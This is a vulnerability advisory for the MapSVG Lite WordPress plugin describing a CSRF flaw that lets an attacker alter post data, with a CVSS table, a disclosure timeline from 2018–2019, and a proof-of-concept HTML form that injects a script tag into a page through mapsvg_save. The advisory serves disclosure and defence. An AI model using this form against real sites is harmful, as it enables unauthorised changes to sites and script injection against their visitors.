CVSS Summary
| Score | 5.8 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | Partial |
| Integrity | Partial |
| Availability | None |
Advisory:
CSRF in MapSVG Lite could allow an attacker to do almost anything an admin can
Vulnerability
Last revised:
The plugin uses REST requests to modify post data, and does not check the nonce when doing so.
Current state: Reported
Proof of concept
- Install the plugin on a site at http://localhost/
- Ensure you have page with ID of 2.
- Whilst logged in, visit an html page with this content and submit the form:
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=mapsvg_save">
<input type="text" name="data[title]" value="A bad value">
<input type="text" name="data[mapsvg_data]" value="<script>alert('hello')</script>">
<input type="text" name="data[map_id]" value="2">
<input type="submit">
</form>
- Visit the page with ID of 2. It now has title of “A bad value” and alerts “hello” on loading.
Advisory timeline
- 2018-04-10: Discovered
- 2018-06-15: Author notified via email
- 2018-06-15: Author replied, advised fix to be published in next release
- 2019-01-08: Advisory published
- 2019-01-08: CVE requested
Mitigation/further actions
Disable the plugin until a fix is released.